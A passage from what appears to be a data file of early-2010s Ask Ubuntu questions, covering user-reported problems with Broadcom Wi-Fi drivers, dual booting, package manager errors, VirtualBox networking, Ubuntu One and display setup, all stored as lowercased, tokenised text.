e8 : bb:67 : b9 inet addr:192.168.5.109 bcast:192.168.5.255 mask:255.255.255.0 inet6 addr : fe80 : :224 : e8ff : febb:67b9/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:13807 errors:0 dropped:0 overruns:0 frame:0 tx packets:9503 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:15997294 ( 15.9 mb ) tx bytes:1087286 ( 1.0 mb ) interrupt:46 base address:0xc000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:64 errors:0 dropped:0 overruns:0 frame:0 tx packets:64 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:4672 ( 4.6 kb ) tx bytes:4672 ( 4.6 kb ) if any other information is needed please let me know . again thank you for your time ! additional information : sudo ifconfig wlan0 up ; iwconfig ; wlan0 : error while getting interface flags : no such device lo no wireless extensions . eth0 no wireless extensions . eth2 ieee 802.11 access point : not-associated link quality:5 signal level:0 noise level:0 rx invalid nwid:0 invalid crypt:0 invalid misc:0 lspci -nnk | grep -i net -a2 : 08:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 03 ) subsystem : dell device [ 1028:02c0 ] kernel driver in use : r8169 -- 0e:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) subsystem : dell wireless 1397 wlan mini-card [ 1028:000c ] kernel driver in use : wl rfkill list : 0 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no 1 : dell-wifi : wireless lan soft blocked : yes hard blocked : yes if i do put on the proprietary driver ( which i 've read in several forums to remove ) it still does n't let me use my wireless . as it currently stands i have it activated and i still have for my rfkill : 0 : dell-wifi : wireless lan soft blocked : yes hard blocked : yes 1 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no i tried the solutions here and they did not work : dell inspiron 1545 wired and wireless do not work additional information : if you have the interface eth2 or something similar and ca n't set your card to monitor mode then open your package manager and search for bcm uninstall that crap make sure you have the firmware-b43-lpphy-installer and b43-fwcutter while youre there . type into terminal cat /etc/modprobe.d/* | egrep 'bcm' and see if the term blacklist bcm43xx is there . if it is , type cd /etc/modprobe.d/ sudo gedit blacklist.conf put a # in front of the line : blacklist bcm43xx then save the file ( you might get some funky messages saying that it isnt saving , it should be ok ) reboot you may have to re-apply the previous command : sudo rmmod dell-laptop i believe you have to blacklist wl as well as it wont let you get into monitor mode and you want it replaced by the kernel driver b43-pci-bridge as stated in the following code : lspci -nnk | grep -i net -a2 subsystem : dell device [ 1028:02c0 ] kernel modules : i2c-i801 08:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 03 ) subsystem : dell device [ 1028:02c0 ] kernel driver in use : r8169 kernel modules : r8169 0e:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) subsystem : dell wireless 1397 wlan mini-card [ 1028:000c ] kernel driver in use : b43-pci-bridge
102288	pin window to desktop	how can i force one window to always remain at the back of the window stack ? i want to run firefox pinned to the desktop and prevent other windows from ever ending up behind it .
102293	installing ubuntu one in windows 7 - hangs at `` getting information , please wait ... ''	i am making the switch from dropbox to ubuntu one ( or , attempting to do so . ) i have several machines with ubuntu and windows 7 . i have an ubuntu one account , have added files from a couple ubuntu machines , can access them on my android devices , but have been unable to successfully install ubuntu one on a windows 7 computer . i have tried two , and on both the install process hangs at the `` getting information , please wait ... '' screen after i enter my credentials . i have tried google and searching here , but have not found a solution . any advice would be greatly appreciated . machine details : windows 7 , 64 bit , fully updated avast free a/v windows firewall enabled ( i tried letting ubuntu one through , and this did not help . )
102294	how to fix one virtual desktop to my second monitor with kde ?	i have two monitors on a nvidia card . kde combines the second monitor with twinview to all my virtual desktops . while this is nice i 'd rather had an additional virtual desktop ( let 's say desktop # 5 ) fixed to my second monitor while switching beetween desktop # 1 to # 4 on my first monitor . can this been done ? ( kde 4.8 , ubuntu 11.10 ) at the monent i can only use the following workaround : drag an application to the second monitor on desktop # 1 and apply `` fix to all desktops '' on the window in question . then when switching desktops the window shows on all of them but is fixed to a position on the second monitor . while this works it 'd be more convenient if i could have an independent desktop on my second monitor with it 's own activities ; panels and stuff . and when starting an application there it should stay there also ... i also tried to configure the second monitor as individual x-server-dislpay . but then still i ca n't send running applications over to the second screen ...
102295	dynamic ip not working from the lan	i 've configured a dynamic ip following this instructions : http : //ubuntulinuxhowto.blogspot.com/2006/06/dynamic-dns-no-ip.html the dynamic ip is working allright from outside the lan , redirecting it to my computer which is 192.168.1.50 , but when i try to access it from inside the lan , what i get is the configuration-page of the router , which is in 192.168.1.1 what am i missing ?
102296	how to run gui app from cron as root ?	the following works in cron : * * * * * non-root-user export display=:0.0 ; zenity -- info and displays a zenity dialog on non-root-user 's desktop each minute . but if i do the following : * * * * * root export display=:0.0 ; zenity -- info it does not work - nothing is shown on 0.0 display . what am i doing wrong ?
102299	how do i use acpi_call ?	how am i supposed to run/install acpi_call ? i 've found a similar solution on the linux hybrid graphics blog , but still could n't manage to run it .
102302	is there any open source microsoft project mpp viewer ?	we know that .mpp file extension is a proprietary file format . but , is there any open source viewer which work with these kind of files ?
102311	installation stops with random text and blinking cursor	i am installing ubuntu on a friends ibm thinkpad and have run into the strangest problem . i have a cd-r and used the recommended program to burn the .iso image . i insert it into my friends laptop it hums and boots up i see the ubuntu menu with all the options `` install ubuntu , use without installing ext . '' when i use the arrow keys to select `` install ubuntu '' it goes into a screen of long scrolling text , in by which case if you look at the attached picture comes to these lines of text and just sits there with a blinking cursor doing nothing . on some days it wont even go to the ubuntu menu and will just flash the `` keyboard = man '' and go to the same lines of text . i do n't have much experience with ubuntu which is why i came here . any suggestions/ help would be very appreciated . i should also point out that i can boot from cd because i booted a windows xp install cd i had lying around and it installed and booted just fine . i tried desgua 's idea of adding acpi=off noapic , to no avail i was presented with the same screen as before . this time it went straight to the screen without the scrolling text . any other ideas to the solution of this problem ? [ update ] if i go to `` install ubuntu '' then press f6 , the long line at the bottom next to `` boot options '' if i delete `` quiet splash -- '' at the end it begins to boot with the long scrolling lines of text , it still however greets me with the same screen after the last line of the long scrolling text , `` trying to unpack rootfs image as initramfs ... '' it sits here for a few seconds then shows me the same screen as before . update : i tried desgua 's idea of adding acpi=off noapic , to no avail i was presented with the same screen as before . this time it went straight to the screen without the scrolling text . any other ideas to the solution of this problem ? update : if i go to `` install ubuntu '' then press f6 , the long line at the bottom next to `` boot options '' if i delete `` quiet splash -- '' at the end it begins to boot with the long scrolling lines of text , it still however greets me with the same screen after the last line of the long scrolling text , `` trying to unpack rootfs image as initramfs ... '' it sits here for a few seconds then shows me the same screen as before . [ update ] i tried to the menu option `` check disk for defects '' same screen . as for removing the hard drive , even if the hard drive could be removed i do n't have anything to stick that hard drive into this laptop is pretty old . since i ca n't boot from usb . [ update ] i did the memory test and it said everything passed .
102312	'e : sub-process /usr/bin/dpkg returned an error code ( 2 ) ' while updating	terminal dpkg : error : parsing file '/var/lib/dpkg/available ' near line 0 : field name `/usr/share/gnome/help-langpack/evince/bg/duplex-11pages.page ' must be followed by colon e : sub-process /usr/bin/dpkg returned an error code ( 2 ) ubuntu software center installarchives ( ) failed : dpkg : error : parsing file '/var/lib/dpkg/available ' near line 0 : field name `/usr/share/gnome/help-langpack/evince/bg/duplex-11pages.page ' must be followed by colon error in function :
102314	update manager fails to fetch update info	i just installed 11.10 on my netbook and it wo n't fetch any updates . i know there 's a ton of updates but it does n't list 'em . changing the mirror did n't help . while scanning it just says downloading or waiting for jockey-backend to close or something . i googled jockey . somebody said you have to uninstall additional drivers which i tried to do in the software center only it would n't work 'cause it was waiting for jockey-backend to close ! so i killed jockey like this . updating would still not work . i then tried this even though i did n't get that error mentioned . still not updating . it 's frustrating . been checking the similar questions on here but i do n't understand some of the solutions mentioned .
102323	how to fix errors running apt-get ?	a while ago updates stopped working . now , when running apt-get , i get the following error : errors were encountered while processing : libgl1-mesa-glx libglu1-mesa e : sub-process /usr/bin/dpkg returned an error code ( 1 ) edit : output http : //pastebin.com/xcklrfgv also , running ubuntu 11.04
102325	no sound from line-in	i have two computers that i want to have coming through the same speakers , i bought a cable , which i connected from the headphone jack on the one computer to the line-in jack on the other . i know sound is coming out of the headphone jack ( confirmed by using headphones ) . but when i plug the cord into the line-in , i ca n't get it to output the signal that 's coming in on line-in .
102326	how install ca certificate for a wireless network ?	i need to configure wireless network . to do it i need to install ca certificate . how to do it in ubuntu ?
102332	webex audio not working with 11.10	i can see presentations , chat , screen-share , everything in webex meeting but ca n't make audio work , i always get : '' the audio device is unaccessible now '' does anyone know what is happening ? thanks .
102333	burg installation errors	yesterday , when i booted my computer i got the grub loading screen , then my bios in an infinite loop . i was able to use boot repair to fix this and boot into both oses . today i decided to install burg again , but this time i installed super boot manager and attempted to install that way . i was able to do so but there ware many pages of duplicate ubuntu icons , making it useless . the entries are still there , how can i delete them ? i used sbm to remove burg and restore grub . grub is working right now . but , when i attempt to install burg again , with or without sbm , i get the following errors : the following packages have unmet dependencies : burg : depends : burg-pc ( = 1.98+20100623-1 ) but 1.98+20100623-2.3 is to be installed depends : burg-themes but it is not going to be installed e : unable to correct problems , you have held broken packages . i 'm using 11.10 .
102334	`` sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log . ''	the story is that i 've managed to install ubuntu on my windows 7 laptop and gives me the choice of which operating system i want to use every time the laptop boots up . however , i have internet on windows 7 . yet , no internet on ubuntu . the result i get with this problem is `` sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log . '' what is even worse , i have to keep switching back and forth to figure out what you 're responses are going to be and what attempts i 've tried to get internet access to work on ubuntu .
102335	how can i have quick access to a file ?	i need a shortcut , menu entry of some type ( not a desktop shortcut ) that readily allows me to access a particular file on the disk . i 'm thinking something like when i pin a .txt file to the start menu in windows . is that possible ? i 'm using ubuntu 11.10 .
102336	previous versions of linux in grub ?	so i have linux versions 3.0.whatever-12 to 15 on my laptop , and they made a ton of icons in burg before i broke that . so how can i get rid of them ? they appear in `` previous versions '' in grub .
102338	where and how to unpack tar.gz ?	i download for example flash player and eclipse . they are in tar.gz format . where i need to unpack them ? is there some directory where all software is installed ? my firefox will see flash , or i need to do something to make it work ?
102339	configuring network without default gateway	i 'm trying to connect my desktop and laptop using an ethernet connection . i usually configure network from the command line but this time i decided to give network manager a try , so i went to network connections , and selected manual ip configuration . at first i left the default gateway field blank , since i do n't need a default gateway . turned out network manager does n't let me save the connection unless i enter that field , but entering a phony gateway messes up with my internet connection . anyway to do this setup ?
102343	ubuntu randomly stopped booting	i 'm using ubuntu since 2007 on a dell vostro 1510 and ubuntu always did the job . i recently installed 11.10 , its been working for the past two weeks with gnome shell . it worked some one hour ago still and because the wireless did n't seem to pick networks in the new location i am at the moment , i rebooted my laptop . suddenly however , ubuntu did not boot . the process goes through : * pulseaudio configured for per-user sessions saned disabled ; edit /etc/default/saned * starting cups printing spooler/server [ ok ] * starting ana ( h ) ronistic cron * stopping ana ( h ) ronistic cron [ ok ] * checking battery state ... [ ok ] * stopping system v runlevel compatibility [ ok ] ... and that 's where it stops . now i am downloading a livecd right now to save my data and with hope of fixing ubuntu . but i 'm not sure whether i will manage to do that , and besides i 'd like to understand what 's happening . can someone help please ? can i repair my installation using the livecd ? edit : i have tried to upgrade from livecd ( from 11.10 to 11.10 ) but stopped the process once it asked me for a user name and password ( which does n't make sense if one upgrades ) . now as i try again , i do n't even get the option to up grade any more . ( please help i 'd like to salvage the data i have on my disk . ) edit 2 : now trying to boot it says `` missing operating system '' . edit 3 : this thread is abandoned by me , i simply made a new install .
102344	switching keyboard layouts in lubuntu 11.10	i have found an older thread in the ubuntu forums but i guess there is a more simple solution now . i would like to switch between the default german layout and an english ( us ) one .
102350	how do i dual boot ubuntu 11.10 and windows 7 with efi ?	i have a lenovo thinkpad x120e i just got , it came with windows 7 , i formatted it , installed a fresh copy ( i just do n't trust pre-packaged versions ! ) and in the process left some free space for an ubuntu installation . i grabbed ubuntu 11.10 , made a bootable usb drive , loaded up the live environment and ran through the install without a hitch , but rebooted and ... straight to windows . my partition table looks something like this : 1.5 gb root partition ( came with this -- i assume it 's `` the efi partition ? '' ) - ntfs ( i think , if not , fat32 ) 200 gb windows 7 partition ( ntfs ) 80 gb ext4 partition with ubuntu 2 gb swap 4 ( ? ) gb recovery partition ( ntfs ) all i 've found on here and in help sites are guides for 11.04 that involve manually compiling a bunch of things . how do i install grub2 on the efi partition so i get a windows 7/ubuntu choice at boot ?
102351	terminal wont render in ubuntu 11.10	i am completely new to ubuntu and i am getting used to terminal syntax and commands . when i click on my terminal to open it , nothing appears , it says it opens and i can still copy and past commands but i ca n't see anything . io have switched around nvidia drivers but no luck .
102356	external monitor set as primary even when disconnected from laptop	my lenovo x200 laptop has developed a problem recently whereby i get a blank internal screen on booting into ubuntu 11.10 ( display works normally during boot and i get a moment of desktop before it blanks out . gnome-shell menus are not visible during this brief flicker of desktop ) . it seems that my laptop 'thinks ' an external monitor is connected ( and is set as the primary monitor , without mirroring or extending to the internal display ) , even when there 's no monitor connected . here are some observations : if i connect to an external monitor , then my desktop appears on the external . i can then successfully use displays ( system settings ) and xrandr to turn on the internal display ( which is set to 'off ' ) , and can then mirror or extend across both displays . once i 've turned on the laptop screen and set it as primary , i can disconnect the external monitor and use the laptop display independently . if i fire up the laptop without an external display ( in which case i get the blank screen ) , i can switch to an alternative terminal , e.g . tty1 , at which point my internal display functions correctly , but if i return to tty7 it blanks out again , and at this stage i can no longer switch to tty1 , tty2 , etc . i can boot into windows no probs . if i cast my mind back , i think it 's quite possible that i meddled with some settings somewhere in the past in order to set the external monitor as the primary display when the laptop was docked , in which case i wonder if someone might direct me to potential files that i might have modified ( and remind me of the changes that i may have made ) , so that i can revert to the original settings . this would have been a while back though , i think , in maverick or natty ( and i do n't know whether such modifications would persist on upgrade ) . this is a recent development , though , so i think there 's more to it than that . i ca n't think of any software installation or changes to system files that might coincide with the problem appearing . does anyone have any ideas for how to diagnose what 's wrong here ? much appreciated . if there 's a command i can use to print out relevant system info , please let me know and i 'll update the question with the details .
102357	oauth requests to ubuntu one cloud return an empty response ?	i am currently developing a ubuntuone bada app . i can get the tokens via the api , but if i try to request any other part of the api i just get an empty browser window or no event fired in the http listener of the app . my request url looks like this : https : //one.ubuntu.com/api/file_storage/v1 ? oauth_consumer_key=abc & oauth_token=def & oauth_nonce=xdobeqcqyfjnzjsh & oauth_timestamp=1328656660424 & oauth_signature_method=plaintext & oauth_version=1.0 & oauth_signature=uvw % 26xyz i found the parameters on various sites and i am not sure if they are valid . thanks for your help ! !
102358	404 error while trying to install wine	i tried to install wine onto ubuntu from which i have just downloaded , but it gives me a strange message after that . failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-0_2.31.14-0ubuntu1_i386.deb 404 not found etc .
102359	error trying to run a python program	hello guys i 'm actually new to terminal and python . just started following a python tuturial on my ubuntu and i 've reached a part where it asks me to save a .py file and open it in terminal . only when i try to type on terminal $ python egotrip.py i get $ : command not found then i try to type it in python and i get file `` '' , line 1 python egotrip.py ^ syntaxerror : invalid syntax but i mean all names are correct : ( then i gave also tried /home/anacah/desktop/python/egotrip.py and i get traceback ( most recent call last ) : file `` '' , line 1 , in nameerror : name 'home ' is not defined what am i doing wrong ? : ( can someone please help ?
102363	xubuntu wo n't boot after applying security fixes	after i was prompted by the update manager to install some security fixes xubuntu wo n't boot , i do n't know which one of all the updates caused this , how can i look into this. ? i do n't seem to have access to the internet in recovery with netroot even if the module is loaded , briefly i 'm greeted with tty1 but soon thereafter it goes black and unresponsive .
102365	how do i install drivers for an alfa awus036nhr ?	i am very new to ubuntu and i really need to get this usb wireless running . i 'm running ubuntu 11.10 64-bit on a virtual machine . it comes with some instructions for setting up the drivers , but as far as i know that is just to make the driver yourself and i 'm not at that level yet . if someone could tell me how to install the drivers , that would be awesome .
102367	updating nvidia drivers 11.10 ( nvidia 290.xxx.xxx )	hi i installed nvidia drivers using terminal . i added the newest repositories , to ensure getting the newest driver , once that was complete , i ran the following command : sudo apt-get install nvidia-current this started the download and successfully installed the ( 290.xx.xxx ) version . the issue i have is when opening x-server application it still shows nvidia driver version 173.14.30 . can someone walk me through correcting this so it corresponds to the driver installed ? thanks
102369	how can i search for documents in unity ?	i would like to hit the super key , start typing a document name and have that document just show up . it seems like this is something unity should do . am i mistaken or have i somehow corrupted something ?
102375	how to downgrade	i do not like ubuntu 10 . i want lower version than ubuntu 10 , because before i upgraded it , it was better . and also , do you have to delete one version to get the other , or delete it after you get the other , or keep both in the memory .
102384	network computers not showing up	alright , 3 machines running , two using ubuntu 11.10 and one on mac os x . on the two ubuntu machines , both have samba installed and configured on the same workgroup , `` home '' . on machine 1 , i can see all networked machines . on machine 2 , i can only see the mac os x machine . it does n't show the other ubuntu machine . what am i missing on machine 2 to see all networked computers ? any suggestions are welcome . i 'm pretty much stumped .
102389	wine `` untrusted source '' error when attempting to run an executable	i 've been trying to use the program wine in order to download these programs on ubuntu . on the other hand , i 've gotten a message saying i can not . `` downloads/itunes64setup.exe ' is not marked as executable . if this was downloaded or copied from an untrusted source , it may be dangerous to run . for more details , read about the executable bit . ''
102391	is it better to compile from source or to install from a .deb package ?	sometimes , when downloading software from the internet , i find that there is a .deb package ready for either my debian/ubuntu and also a tarball to be compiled . in the beginning i would simply use the package for its ease of installation , and would n't even dare attempting to compile . even the sound of it scared me a bit . nowadays , however , when i have the option i sometimes find myself in a dilemma : is there an unpopular advantage to compiling from source compared with the .deb package ? i hope to find out here , thank you .
102402	my usb test drive hangs on boot . how can i get it to boot with the right options ?	i try to install 64bit ubuntu 11.10 on a toshiba satelite notebook with amd e350 processor . the installation usb successfully tested on an acer aspire desktop although i only ran a try out . on the notebook it started to show just one line of text on the top of the screen for haft an hour and did not proceed further .
102406	how to find mount point for audio cd/dvd	ok , i am using ubuntu 11.10 and i am unable to find the mount point for my cd/dvd . i inserted a cd in the rom , and i see the files just fine in nautilus , but when i try to run the following command sudo mount -l it gives me all the mount points , except one for the cd . i looked in `` /mnt/ '' folder and there are no subfolders . `` /media/ '' folder has a folder name cdrom but is empty and does n't seem to be mounted . so where exactly is my cd mounted ? i also can not find anything that looks like a cdrom device name in `` /dev/ '' .
102408	how do i take my playlists from banshee and put them on itunes and my ipod ?	so i have a dualboot with windows and keep all my music on a shared partition that neither os 's use . i want to know how i would import my banshee onto itunes . i also ca n't sink playlists with my ipod from banshee .
102409	how to resolve videos becoming discolored in all players ?	while trying to play a video in ubuntu 10.04 sometimes the video plays properly . after a while of running the os sometimes the same video when played again will be discolored and also all other videos . restarting the computer fixes this problem temporarily . how can this be resolved ?
102414	how do i force writing of metadata out to files in banshee ?	i have the `` write metadata to files '' option checked , and it works great when i edit a song 's metadata . however , i made tons of changes with this setting off ( before i turned it on ) . can i force a bulk metadata write out of my entire library ? thanks !
102425	why do i have two ( 2 ) launchers after customizing my unity setup with ccsm ?	just installed ubuntu oneric ( 11.10 ) and compizconfig settings manager , made some tweaks , everything is looking great . however , now i have two launchers and these settings do not start automatically if i logout and log back in . i would appreciate any help you can provide . ps : all my drivers are up to date , my pc is an acer with a amd athlon 64x2 dual core processor and a nvidia graphic card with 3d capability .
102426	separate panels for separate workspaces in tint2	i am running ubuntu 11.10 x64 . i have tint2 installed in an attempt to get a gnome2-like bottom-panel . suppose i have windows a , b , and c open on desktop 1 , and windows d and e on desktop 2 . right now , panel buttons for all 5 windows are on the tint2 panels when i am on any desktop . is there a way to get tint2 to act like gnome2 in this regard ? ( i.e. , bottom panel should only show windows a , b , c on desktop 1 ; d , e on desktop2 ; no windows on desktop 3 or desktop 4 ) .
102428	how to troubleshoot slow usb2.0	i 'm running ubuntu 11.10 64-bit and writing to a usb 2.0 device is very slow . i have two usb hard drives and two usb keys that i 've tried . i 've tried using nautilus drag and drop , cp , and rsync commands to transfer a roughly 800mb video file ( to test all of the drives ) . i run iostat -k 5 while the file is transferring and i see a write speed of around 4000-5000 kb_wrtn/s . i 've used disk utility to confirm that the drives are recognized as usb 2.0 drives . i 've tried the drives in all of the usb ports on the back of the machine . i will happily edit this question with more information if anyone can tell me what information i should be looking for or commands i should run to debug this issue .
102430	backup files being created in kubuntu	kubuntu creates a backup file every time i append a file and save it at the time of closing kate editor . i am using kubuntu 11.10
102433	chromium logo invisible	i installed chromium yesterday from the software centre.after installation i searched for it in the dash and then dragged that logo to the launcher . the other logos rightly moved up/down but the logo of chromium is invisible . when i click on the empty space in the launcher , chromium does launch without any trouble ( works all right as well ) but the fact that i cant see the logo means there is some issue . has anyone else faced this problem as i tried searching for it but could n't find anything . please help
102434	wake laptop when lid is opened ?	i have a samsung laptop , which by the experience in the last months , has been a great one . i am actually implementing some functionality to it , and since i noticed , i am able to wake up my laptop from sleep by just opening the lid on windows 7 , however , i need to press to power button to wake up in ubuntu . using a program called i-nex , i noted that the kernel does dettect a `` lid switch '' , and i am looking forward to use it to wake up function . any ideas ? update : thanks @ yossile for bringing up some clues ! however , output of command cat /proc/acpi/wakeup does not show the lid device . i still tried the second set of commands you gave me with no effect . then i tried experimenting , guessing that lid should be named by other value , so i tried enabling the others . no victory so far . but i noticed that devices that did not have any pci listings were disabled at all time no matter what i tried . here is the output of command cat /proc/acpi/wakeup : root @ samsung : ~ # cat /proc/acpi/wakeup device s-state status sysfs node pce4 s4 *disabled pci:0000:00:04.0 sbaz s4 *disabled pci:0000:00:14.2 p0pc s4 *disabled pci:0000:00:14.4 gec s4 *disabled pe20 s4 *disabled pci:0000:00:15.0 pe21 s4 *disabled pe22 s4 *disabled pci:0000:00:15.2 pe23 s4 *disabled pwrb s5 *enabled so maybe it could be that lid is either gec , pe21 , or pe23 ? still , there is /proc/acpi/button/lid/lid/state file which shows that lid is opened . any more ideas ?
102436	how can i look at the log file for details ? , permission denied	i 've installed ubuntu 11.10 on a hp pavilion that has vista home prem . and the broad com sta driver is listed , tested by the ubuntu developers , but will not activate and i get a > look at the log file for details : /var/log/jockey.log when i try to in the terminal i get permission denied , please help , i already am running 11.10 on a toshiba satellite w/vista basic with no problems for a few weeks and really like it . thank you .
102440	setting a greyscale ( or monochrome ) color scheme	i would like to see everything on my computer screen in grayscale ( like say the kindle screen ) . how do i do this ?
102450	how to set up virtualbox bridged network on windows 7 host ?	i have virtualbox running on a windows 2008 server , with a guest running ubuntu 10.04 . the ubuntu guest is given a static ip of 192.168.1.4 , which also has openssh installed . the guest has bridged network setup , i can ping 192.168.1.4 from any machine in the lan , the ubuntu guest can also access the lan . however , when i try to putty into the ubuntu machine , i always get `` connection refused '' . below are some setup details : ubuntu ip : 192.168.1.4 hosts.allow sshd : 192.168.1.38 hosts.deny all : all when i the following command , i can see that sshd is listening on port 22 : lsof -i tcp:22 any idea ? edit : it turned out to be a wrong virtualbox bridged network setup . i give the ubuntu guest a static ip of 192.168.1.4 ( assigned to eth0 ) . then in the windows 7 host , in the network and sharing center , there is a new connection named `` virtualbox host-only network '' after the bridge is setup , that connection is again given the same static ip of 192.168.1.4 . once i change the `` virtualbox host-only network '' to automatically obtain an ip address , it 's getting a different ip address of 169.254.249.70 ( tentative ) . and now i can ssh into 192.168.1.4 with no problem , even without touching hosts.allow and hosts.deny . i 've also noticed that in the properties windows ( see screenshot below ) of the `` virtualbox host-only network '' , the second checkbox , `` virtualbox bridged networking driver '' is unchecked . while the same checkbox of the physical nic ( that is bridged to ) is checked . so my further question is : is this how vbox bridged networking supposed to be setup ? any rationale behind this ? i 'd appreciate if someone could provide some explaination on vbox bridged networking setup on windows host and i 'll accept it as an answer .
102454	ubuntu installation issues , i 've seemingly lost 65gb of hard disk space	sorry for the long read but i tried to be detailed : just tonight i went through the steps outlined at the ubuntu download page , meaning i downloaded the ubuntu 11.10 iso and used pendrivelinux in order to make my usb drive bootable . i restart , fix boot order , and we get into the action . my first issue is that this did n't play out like the website said it would : i received no welcome screen like the one shown , just a bunch of code , then the ubuntu symbol with a list of options under it , i picked install . at this point i 'm supposed to see this image , but instead all i got were the languages and a button to continue . i chose english and continued . the next to steps appeared as they were supposed to but then the 4th step was different . there was no `` install ubuntu alongside windows 7 '' option as there is in this picture , i only had the last two options . here i chose , `` something else . '' now when the next dialog box opened , i got very confused and did a google search and watched some videos on youtube and i thought i would be ok . i was wrong . so i 'm looking at this dialog box informing me of the various partitions on my hard drive . after googling and youtubing , i click on my main partition ( that has windows installed with all my various programs , files , etc . ) , then click `` change ... '' this partition has approximately 304gb of space , and i want to give ubuntu 60gb , so i reduce this partition by 65gb ( so i can have 5gb of space for the swap file , which i 'm sure is more than enough ) . i change the `` use as : '' drop down to ntfs , then hit `` ok '' . i get warned about being unable to undo this , etc. , etc. , i hit continue and then it does it . it shrinks my partition . then a curious thing happens . when in the video ( would have linked the video but the spam filter does n't allow it , can link to it upon request ) and the articles , a new option showed up as `` free space , '' which you could then partition , i simply got an option labeled `` unusable , '' which was allotted 65gb . after toying with that unusable space for a bit i gave up , i quit installation and restarted to make sure windows still worked . everything was fine , except when i went to my computer it said i had 65gb less of hard drive space then i used to have , which i expected . now my question to you experts is this : is there anything i can do about this ? if there is , my priorities are thus : i would still like to install ubuntu if possible , any help toward that would be fantastic . if that former is not possible , i would like to try to add this space back to my main partition . thank you all so much for you help , it is greatly appreciated . edit : i do n't know if this will help any , but my computer is an hp g62 notebook pc , it has a pentium dual-core cpu , and i have but 3gb of ram . hope this information helps . thanks again !
102458	how can i convert .epub files to plain text ?	i 'm able to view an epub file in , say , okular , select all the text and copy-paste into a text editor . i 'd like a command line method - anyone know of such a thing ?
102459	dual boot truble	i am having trouble setting up a dual boot . i can make ubuntu work , or i can make windows work i ca n't get them to dule boot . i had windows installed on a new computer , partitioned the drive and installed ubuntu . partitioning the drive crashed windows , so i did a recovery . windows bootloader took over grub and i could n't figure out how to configure it so i took the easy rout and reinstalled ubuntu which seems to have crashed windows again . i really want linux to work but since i ca n't get wine to work at all i need windows . i 'm about to just write it off as a bad idea and stick to windows . apperenty i 'm not clever enough to make it work .
102465	how can i switch user without password ?	how can i switch user without password in ubuntu server 11.1 ? in centos passwd -d -u username but ubuntu 11.10 not work
102471	epivally sxc 1080 modem	i have tata epivally sxc 1080 1 x usb modem . i want to use it with ubuntu 11.10 64 bit os . what steps should i follow ?
102472	where can i find juju tutorials ?	is there any good and easy-to-understand juju tutorial from beginner ? i know a bit about virtualization using qemu or oracle vm virtualbox and looking forward to enhance my skill in the cloud infrastructure . most of the tutorial are way too advance for me . usually started without explanation on the juju concepts .
102477	catalyst 12.1 for agp card	i have a radeon hd 4650 agp card . the installation instructions at http : //wiki.cchtml.com/index.php/ubuntu_oneiric_installation_guide download catalyst 12.1 however , there is no download available at http : //support.amd.com/us/gpudownload/pages/index.aspx for my agp card . only windows drivers are available . should i go ahead and use the guide and manually install 12.1 ? i assume it 's not on the amd website for a reason , but i was wondering if anybody had any experience with this . thanks !
102480	sudo apt-get upgrade fails due to shared-mime-info.postinst error	on my server i am getting following issue . sudo apt-get update work successfully but sudo apt-get upgrade fails with following error . please help me to solve this issue . administrator @ myserver : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : firefox linux-headers-server linux-image-server linux-server 0 upgraded , 0 newly installed , 0 to remove and 4 not upgraded . 21 not fully installed or removed . after this operation , 0b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up shared-mime-info ( 0.71-1ubuntu2 ) ... /var/lib/dpkg/info/shared-mime-info.postinst : line 13 : 17650 segmentation fault update-mime-database.real /usr/share/mime dpkg : error processing shared-mime-info ( -- configure ) : subprocess installed post-installation script returned error exit status 139 dpkg : dependency problems prevent configuration of libgtk2.0-0 : libgtk2.0-0 depends on shared-mime-info ; however : package shared-mime-info is not configured yet . dpkg : error processing libgtk2.0-0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of chromium-browser : chromium-browser depends on libgtk2.0-0 ( > = 2.18.0 ) ; however : package libgtk2.0-0 is not configured yet . dpkg : error processing chromium-browser ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of chromium-codecs-ffmpeg : chromium-codecs-ffmpeg depends on chromium-browser ( > = 4.0.203.0~ ) ; however : package chromium-browser is not configured yet . dpkg : error processing chromium-codecs-ffmpeg ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of chromium-browser-l10n : chromium-browser-l10n depends on chromium-browser ( = 16.0.912.77~r118311-0ubuntu0.10.04.1 ) no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already ; however : package chromium-browser is not configured yet . dpkg : error processing chromium-browser-l10n ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libevdocument2 : libevdocument2 depends on libgtk2.0-0 ( > = 2.14.0 ) ; however : package libgtk2.0-0 is not configured yet . dpkg : error processing libevdocument2 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libevview2 : libevview2 depends on libevdocument2 ( > = 2.29.5 ) ; however : package libevdocument2 is not configured yet . libevview2 depends on libgtk2.0-0 ( > = 2.20.0 ) ; however : package libgtk2.0-0 is not 